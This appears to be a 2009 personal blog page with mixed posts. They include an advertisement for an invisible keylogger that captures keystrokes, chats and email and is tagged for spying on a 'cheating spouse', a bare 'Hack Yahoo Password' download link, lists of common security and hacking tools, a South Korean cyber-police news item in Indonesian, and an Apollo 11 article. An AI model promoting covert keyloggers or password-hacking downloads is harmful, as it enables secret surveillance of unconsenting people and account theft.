Share For All: 2009

Tuesday, September 15, 2009

PC Activity Monitor Pro 6.5.1


PC Activity Monitor (PC Acme) is an ultimate invisible and undetectable easy-to-use monitoring and surveillance tool for both networked and personal PCs. It is professional software that captures all users activity on the PC. All data collected by the monitoring are saved to encrypted log file. The log file can be optionally sent via e-mail to a specified address (or saved to a specified shared resource in LAN environment) for further inspection and analysis.

The important advantage of PC Acme Pro keylogger is an ability to save log files in special database for further analysis and retrieving information by specifying a search condition.It is a powerful management tool for users and companies, which want to increase their productivity and profitability. This is the most remarkable security product for a computer you have seen.

Program works in background, transparent for user, and captures the following events:

- Application start

- Switching between applications/windows. In addition program saves

static text elements and windows edit controls:

- Window content of most chat clients (ICQ, AIM, Yahoo etc.)

- Content of Internet browser window (Internet explorer)

- Mail content, viewed by Microsoft Outlook and Microsoft Outlook Express

- etc.

- Keystrokes

- Pasting text from clipboard

- File operations

- System registry operations

- Application installation/uninstallation

- Putting programs in Startup folder

- Visiting web sites.

Log files are converted to HTML format for more convenient viewing in browser (Internet Explorer 4.0 or higher is recommended).

Log file can be optionally sent via e-mail to specified address (or saved to specified shared resource in LAN environment) for further inspection and analysis (NET and PRO versions only).

The important advantage of PRO version is an ability to save log files in special database for further analysis and retrieving information by specifying a search condition.
Short tags:
security, monitoring, intelligence, access control, parental control, investigation, surveillance, detective, espionage, spy, key loger, keylogger, trojan, hack, hacking, cheating spouse, internet
System Requirements:
None
Change Info:
support for Portuguese/Brasilian, Romanian and Hungarian languages is added; bugs in Log Viewer are fixed.

----DOWNLOAD NOW----

Monday, September 14, 2009

Hack Yahoo Password Yahoo 2009




------klik here to download------

Top 10 Windows Hacking Tools

1. Cain & Abel – Cain & Abel is a password recovery tool for the Microsoft Windows Operating System. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

2. SuperScan – SuperScan is a powerful TCP port scanner, pinger, resolver. SuperScan 4 (Current Version) is a completely-rewritten update of the highly popular Windows port scanning tool, SuperScan.

3. GFI LANguard Network Security Scanner – GFI LANguard N.S.S. is a network vulnerability management solution that scans your network and performs over 15,000 vulnerability assessments. It identifies all possible security threats and provides you with tools to patch and secure your network. GFI LANguard N.S.S. was voted Favorite Commercial Security Tool by NMAP users for 2 years running and has been sold over 200,000 times!

4. Retina – Retina Network Security Scanner, recognised as the industry standard for vulnerability assessment, identifies known security vulnerabilities and assists in prioritising threats for remediation. Featuring fast, accurate, and non-intrusive scanning, users are able to secure their networks against even the most recent of discovered vulnerabilities.

5. SamSpade – SamSpade provides a consistent GUI and implementation for many handy network query tasks. It was designed with tracking down spammers in mind, but can be useful for many other network exploration, administration, and security tasks. It includes tools such as ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, website search, and more.

6. N-Stealth – N-Stealth is a commercial web server security scanner. It is generally updated more frequently than free web scanners such as whisker and nikto, but you have to pay for the privilege.

7. Solarwinds – Solarwinds contains many network monitoring, discovery and attack tools. The advanced security tools not only test internet security with the SNMP Brute Force Attack and Dictionary Attack utilities but also validate the security on Cisco Routers with the Router Security Check. The Remote TCP Reset remotely display all active sessions on a device and the Password Decryption can decrypt Type 7 Cisco Passwords. The Port Scanner allows testing for open TCP ports across IP Address and port ranges or selection of specific machines and ports.

8. Achilles – The first publicly released general-purpose web application security assessment tool. Achilles acts as a HTTP/HTTPS proxy that allows a user to intercept, log, and modify web traffic on the fly. Due to a cyber squatter, Achilles is no longer online at its original home of www.Digizen-Security.com…OOPS!

9. CookieDigger - CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications. The tool works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values.

10. Netcat (The Network SwissArmy Knife) – Netcat was originally a Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

Korsel Siapkan 3.000 Polisi Cyber


SEOUL - Korea Selatan berencana melatih 3.000 orang untuk dijadikan sebagai polisi cyber. Nantinya, mereka akan mengawal situs bisnis dan pribadi dari serangan-serangan di dunia maya.

"Para polisi cyber tersebut akan kami tugaskan untuk melindungi informasi perusahaan dan mencegah kebocoran rahasia industri dari serangan penjahat dunia maya," demikian keterangan dari pemerintah yang dilansir Yonhap dan dikutip AFP, Senin (14/9/2009).

Untuk mengatasi serangan cyber pula, Badan Intelijen Nasional Korsel akan membentuk sebuah gugus tugas yang terdiri dari warga sipil maupun pegawai pemerintah, untuk menangkal ancaman online. Kehadiran polisi cyber ini untuk memperkuat unit cyber militer yang sebelumnya telah ada.

Negeri Ginseng memang sering menjadi sasaran empuk serangan para penjahat dunia maya yang menyerang situs-situs kepresidenan, kementerian pertahanan, parlemen, maupun perbankan. Para penyelidik Departemen Luar Negeri Amerika Serikat sejauh ini gagal menelusuri siapa di balik aktivitas peretasan itu.

Kendati belum berhasil mengungkap dalang aksi tersebut, Korsel menuduh Korea Utara yang bertanggung jawab atas sejumlah serangan.

Korea Selatan sendiri memiliki akses internet yang paling kencang. Sebanyak 95 persen penduduknya sudah menggunakan broadband di rumahnya. Maka tak mengeherankan jika sebuah survei yang berbasis di Boston, Amerika Serikat, memilih Korsel sebagai negara dengan akses internet paling cepat di dunia.

Wednesday, July 29, 2009

10 frequently used tools of the hacker

NMAP Creator conduct a survey of 100 favorite tools pursuivant nmap-hackers mailing list. Approximately 3.243 users to give voice to the tool they gemari. List of 100 favorite tool of the hacker is found in jg www.insecured.org
100 of the tool, follows below are 10 tools that get your favorite sound throughout most of 2006. The tool is a weapon that is considered absolutely necessary in the event of hacking and security.

1.Nessus
"Nessus" first made by Renaud Deraison in 1998 and spread to the Internet community at large, useful, most well-update and easy to use.
Nessus is a program to search for weaknesses in a computer system. According to the site authorized in www.nessus.org, this tool has been used by more than 75,000 companies and organizations around the world.

2.Snort
Snort is an IDS, which is a tool to prevent and detect attacks against computer systems. Vendor's claim that snort this tool has been downloaded millions of times from their site. You may be interested to try it, please download this tool at www.snort.org.

3.Kismet
Kismet is a tool to detect the wireless connection (802.11b support traffic, 802.11a, and 802.11g), capture packets in a network system and become an IDS (Intrusion detection System).
To find out more about kismet, you can visit the site http://www.kismetwireless.net or go to irc.freenode.net # kismet.

4.Metasploit Framework
Metasploit Framework is an open source project to develop, test and use the code eksploit. Created with the Perl language as the basis and foundation, and consists of components that have complementary dicompile with the C language, assembler, and Python. Metasploit Framework can run on operating systems UNIX, Linux and Windows. A more detailed description you can find in http://www.metasploit.com.

5.Netcat
Netcat networking tool is a utility that can read and write data on a network connection via TCP / IP.
Features that are on the netcat among others:
■ incoming and outgoing connections through TCP or UDP protocol with the port that is used ..
■ Tunneling mode, tunneling from UDP to TCP, to map out the parameters in the network (source port / interface, listening port / interface, and allow the remote host to connect tunnel)
■ Port scanner, to detect the open port.
■ Buffered send-mode and hexdump RFC854 telnet.

6.Hping
Hping is a versatile tool. This tool can be used to test the ability of the firewall, look for the open port, test the security of the network by using different types of protocols, operating systems get information, evaluate the TCP / IP.

7.TCPDump
Tcpdump is also a sniffer. Admin network using this tool to monitor traffic and analyze the problems in case of interference. According to the information in http://www-iepm.slac.stanford.edu/monitoring/passive/tcpdump.html, using Tcpdump packet filter from BSD UNIX to re-capture data (BPF / BSD Packet Filter). BPF receive a copy of the driver sender and the recipient can also paket.Pengguna tcpdump filter packet in accordance with the desire.

8. John The Ripper
A password cracker age of fathers of the hackers is still a favorite tool of 10. Here is a description of the John the Ripper.
"John the Ripper is a password cracker, currently available for UNIX, DOS, WinNT/Win95. Its primary purpose is to detect weak UNIX passwords. It has been tested with x86/Alpha/SPARC Linux, FreeBSD x86, OpenBSD x86, Solaris 2.x SPARC and x86, Digital UNIX, AIX, HP-UX, and IRIX. "

9. Cain And Abel
Cain & Abel is a tool for password problems. This tool can collect passwords with network sniffing method, to-crack passwords using Dictionary attack, Brute-Force and Cryptanalysis attacks, recording VoIP conversation (Voice Over Internet Protocol), to crack wireless networks, analyze traffic in the network. www.oxid.it

10. WireShark / Ethereal
Wireshark / Ethereal is a tool to analyze the network protocol. Also functions as a sniffer. Monitor internet traffic. Wireshark
can run on Windows, MAC OS X, and Linux. www.wireshark.org

Interested? Learn and understand how to use the only tool page 10. We will not really be that great hacker with only 10 on the tool above. But tool2 page has been recognized by all levels Hacker. I can be for additional anda2 to menggeluti computer security in depth.

Thursday, July 23, 2009

Apollo 11 Moon Landing Delivered 40 Years Of Spin-Off Tech


The heroes of America's moon landing last night called for the US to launch a mission to Mars and beyond, in a rare joint appearance aimed at reigniting interest in costly and risky manned space flight.

Now in their late 70s, Neil Armstrong, Buzz Aldrin, Michael Collins and John Glenn recounted their exploits, describing the massive US effort to beat the Soviet Union in the space race that culminated 40 years ago today, when Armstrong and Aldrin stepped out of the Eagle moon lander on to the lunar surface.

Several of the men called on Barack Obama to lead the country on a second mission, this time to Mars. But the star of the evening, Armstrong, refused to be drawn into the debate, instead describing the Apollo mission that granted him worldwide fame as a "diversion" primarily useful as a peaceful outlet for cold war competition between the US and the Soviet Union.

"It did allow both sides to take the high road with the objectives of science and learning and exploration," said Armstrong, the first human on the moon. But he noted the parallel development of the space programme and the intercontinental ballistic missiles capable of mass destruction.

Last night's lectures at the Smithsonian National Air and Space Museum were the latest in a series of speaking engagements and events intended to build excitement about space exploration among a population that was largely not born at Nasa's peak. The evening was sponsored by Boeing, the aerospace giant that would stand to win billion-dollar contracts in a newly energised space effort.

Humans last set foot on the moon 37 years ago, and the American public has grown ambivalent about the space programme. Last week's launch of the space shuttle Endeavour – a craft slated for retirement next year – provoked a national shrug. Nasa hopes to return humans to the moon by 2020 and to Mars by mid-century, but the president has shown little interest in the massive investment of tax dollars needed to explore the solar system.

In brief remarks, the astronauts and the Nasa mission control founder, Christopher Kraft, noted the technological advancement, spirit of national unity and position of world leadership the Apollo programme brought America.

"Nasa is the best return on investment that this country has ever seen," Kraft said. "What we need is new technology; we have not had that since Apollo … I say to Mr Obama: Let's get on with it. Let's invest in the future."

Aldrin urged the country to commit to a colony on Mars, using an international lunar outpost as a stepping stone.

"It was a great personal honour to walk on the moon, but as Neil once observed, there are still places to go beyond belief," Aldrin said. "Isn't it time to continue our journey outward, past the moon?"

Collins warned that a second effort to explore the moon would be a technological "briar patch" that would distract the nation from reaching Mars.

The astronauts noted that the nation was spurred to the Apollo programme – which cost more than $1tr in 2009 dollars — by the Soviet launch in 1957 of the Sputnik satellite and the launch soon after of cosmonaut Yuri Gagarin into orbit.

"This was not some idle objective," said Glenn, who in 1962 became the first American to orbit the Earth, nor a "scientific stunt".

America's current arch-enemy, al-Qaida, is not a competitor in the space race, and Indian, Chinese and European ambitions have not provoked the fear of a militarised space that the Soviets did.

If nothing else, the evening reminded America how distant the glory days of the space programme lie. Aldrin, Armstrong and Collins were reminiscent of one's granddad – white-haired men who told exciting stories of long-ago feats of bravery and teamwork. In introductory remarks in the museum lobby, the astronauts noted that they had piloted several of the retired jets and spacecraft on display, as if acknowledging their fellow museum pieces.

Pointing to the glass-encased Apollo 11 command module, Kraft joked about his personal role in preparing it for flight four decades ago.

"First thing in the morning Neil made me polish it. Last thing at night, I polished it," he said. "I'm not sure it's getting that kind of care."


ShoutMix chat widget

Followers

 

Copyright © 2009 by Share For All